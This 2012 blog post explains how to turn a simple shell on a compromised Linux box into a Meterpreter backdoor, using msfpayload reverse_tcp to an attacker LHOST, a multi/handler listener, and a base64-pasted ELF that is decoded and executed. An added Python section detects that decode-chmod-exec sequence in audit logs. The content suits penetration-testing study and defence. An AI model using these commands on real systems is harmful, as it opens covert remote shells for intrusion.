Wednesday, May 2, 2012

Upgrading To Meterpreter.... Backdoor on Linux




I've been getting back into Metasploit recently and was pleasantly surprised at a lot of the new features. Meterpreter stands out as a pretty cool function, and it's even cooler that if your exploit isn't compatible with the meterpreter stage right off, you can upgrade to it afterwards...if you got a shell on a win32 system.

Simply run 'sessions -u ' and your session gets updated from a simple win32 shell to meterpreter.

On Linux however this isn't supported (yet?). If you can only get a simple shell there isn't a built-in way to upgrade it, but it is possible to do it manually. I found references to this in a couple of places but couldn't find anyone who had documented the steps (or maybe my Google f00 isn't what it used to be).

So without further ado, here we go:
Get yourself a shell on your remote Linux box

Compile your payload

# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=12345 R | msfencode -t elf -o metarev


This compiles the reverse_tcp payload to connect back to 192.168.1.10 on port 12345, then encodes the payload as a Linux ELF binary and writes it to 'metarev'.

Base64 encode the binary so you can copy it over. Alternatively you could pull down the payload from a server you have set up elsewhere, but this isn't always possible and increases the likelihood your attack will be detected.

base64 metarev > b64_metarev

 Get your local system ready for the reverse shell (in msfconsole).

> use exploit/multi/handler

> set payload linux/x86/meterpreter/reverse_tcp

> set LHOST 192.168.1.10

> set LPORT 12345

> exploit -j

Get back into your basic shell session and copy over the payload, decode it and execute it. We'll use cat to open the file, send the encoded data via stdin and then close the file by sending an EOF on a newline.

cat > b64_metarev << EOF

(send base64 encoded binary)

EOF (on a newline!)

> base64 -i -d b64_metarev > metarev (you need the -i, i.e. --ignore-garbage, so stray characters from the paste are skipped; otherwise the decoded binary will be corrupt)

> chmod +x metarev

> ./metarev

You should now see the shell connect back to you and send the intermediate stager, send the full meterpreter stage and then execute it.

Back out of your basic shell with Ctrl+Z, check 'sessions -l' to see your shiny new meterpreter session!



Note: The payload will segfault if there isn't a listener running on your LHOST, and the basic shell won't show this: successful execution of the payload looks exactly the same as a failure.
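The same sequence seen from the defending side: the steps above leave a distinctive trail in a shell audit log (a file written from pasted base64, decoded, made executable and run within a minute or two). The Python below is an added example, not code from the original post, and it runs over a constructed command audit trail; the "timestamp session-id command" line format, the session ids and the ten-minute window are assumptions. Session s42 mirrors the post's steps, the other sessions are controls (an ordinary base64-decoded archive, a decode without -i, and an execution that happens too long after the decode).

```python
import re
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of a shell command audit trail, one line per command:
# "ISO-timestamp session-id command". s42 mirrors the post; s17, s9, s3 are controls.
SAMPLE_LOG = """\
2012-05-02T10:14:01 s42 cat > b64_metarev
2012-05-02T10:14:30 s42 base64 -i -d b64_metarev > metarev
2012-05-02T10:14:33 s42 chmod +x metarev
2012-05-02T10:14:35 s42 ./metarev
2012-05-02T11:02:10 s17 base64 -d backup.b64 > backup.tar
2012-05-02T11:02:12 s17 tar xf backup.tar
2012-05-02T12:00:00 s9 base64 --decode tool.b64 > /tmp/tool
2012-05-02T12:00:05 s9 chmod 755 /tmp/tool
2012-05-02T12:00:07 s9 /tmp/tool
2012-05-02T13:00:00 s3 base64 -d x.b64 > x
2012-05-02T13:00:02 s3 chmod +x x
2012-05-02T13:40:00 s3 ./x
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.+)$")
WINDOW = timedelta(minutes=10)  # assumed: decode-to-exec must complete within this span

def _short_flags(tokens):
    """Collect single-letter flags, so '-id' counts as both -i and -d."""
    flags = set()
    for t in tokens[1:]:
        if t.startswith("-") and not t.startswith("--") and len(t) > 1:
            flags.update(t[1:])
    return flags

def _redirect_target(tokens):
    """File on the right-hand side of '>' if the command redirects stdout."""
    if ">" in tokens and tokens.index(">") + 1 < len(tokens):
        return tokens[tokens.index(">") + 1]
    return None

def _grants_exec(mode):
    """True for chmod modes that set an execute bit (+x, 755, u+rwx, ...)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode and not mode.startswith("-")

def classify(cmd):
    """Map a command line to ('decode'|'chmod'|'exec', path, lenient) or None."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return None
    if not tokens:
        return None
    prog = tokens[0].rsplit("/", 1)[-1]
    if prog == "base64":
        flags = _short_flags(tokens)
        if "d" not in flags and "--decode" not in tokens:
            return None  # encoding, not decoding
        lenient = "i" in flags or "--ignore-garbage" in tokens
        return ("decode", _redirect_target(tokens), lenient)
    if prog == "chmod":
        if any(_grants_exec(t) for t in tokens[1:-1]):
            return ("chmod", tokens[-1], None)
        return None
    if tokens[0].startswith("./") or "/" in tokens[0]:
        return ("exec", tokens[0], None)  # run by path rather than by $PATH lookup
    return None

def detect_decode_chmod_exec(log_text, window=WINDOW):
    """Flag sessions that decode a file from base64, mark it executable and run it."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions[m.group(2)].append((datetime.fromisoformat(m.group(1)), m.group(3)))
    findings = []
    for sid, events in sessions.items():
        decoded, made_exec = {}, {}  # basename -> (ts, lenient) / ts
        for ts, cmd in events:
            c = classify(cmd)
            if c is None or c[1] is None:
                continue
            kind, path, lenient = c
            name = path.rsplit("/", 1)[-1]  # './x', '/tmp/x' and 'x' refer to the same file
            if kind == "decode":
                decoded[name] = (ts, lenient)
            elif kind == "chmod" and name in decoded and ts - decoded[name][0] <= window:
                made_exec[name] = ts
            elif kind == "exec" and name in made_exec and ts - decoded[name][0] <= window:
                findings.append({
                    "session": sid,
                    "file": name,
                    "decoded_at": decoded[name][0].isoformat(),
                    "executed_at": ts.isoformat(),
                    # -i/--ignore-garbage is only needed when the base64 text came in
                    # through an interactive paste, so it is the stronger indicator
                    "lenient_decode": decoded[name][1],
                })
    return findings

if __name__ == "__main__":
    for finding in detect_decode_chmod_exec(SAMPLE_LOG):
        print(finding)
```

Matching on the basename rather than the full path is deliberate: the decode, the chmod and the execution in the post all name the file differently ('metarev' vs './metarev'), and a correlation keyed on the exact string would miss the chain. The window keeps a legitimate "decode a backup today, run something with the same name next week" from lining up.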

So there you go. Meterpreter is still much more useful on a Windows machine (vs a win32 shell), but it's a good thing to keep on hand should you need it on a Linux machine too.
